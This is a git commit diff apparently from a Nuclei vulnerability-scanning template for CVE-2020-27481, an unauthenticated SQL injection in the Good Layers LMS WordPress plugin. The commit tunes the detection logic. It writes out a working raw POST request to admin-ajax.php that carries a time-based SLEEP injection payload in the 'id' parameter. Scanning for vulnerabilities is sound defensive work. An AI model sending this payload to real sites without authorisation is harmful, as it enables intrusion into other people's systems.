updated matchers
parent
a0dec26e6e
commit
7ff9396081
|
@ -7,6 +7,7 @@ info:
|
|||
description: |
|
||||
An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/652eaef8-5a3c-4a2d-ac60-b5414565c397
|
||||
- https://gist.github.com/0xx7/a7aaa8b0515139cf7e30c808c8d54070
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-27481
|
||||
classification:
|
||||
|
@ -16,18 +17,17 @@ info:
|
|||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(5)))MrMV)
|
||||
action=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=5'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- "duration>=6"
|
||||
- "status_code == 200"
|
||||
- "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"
|
||||
condition: and
|
||||
|
|
Loading…
Reference in New Issue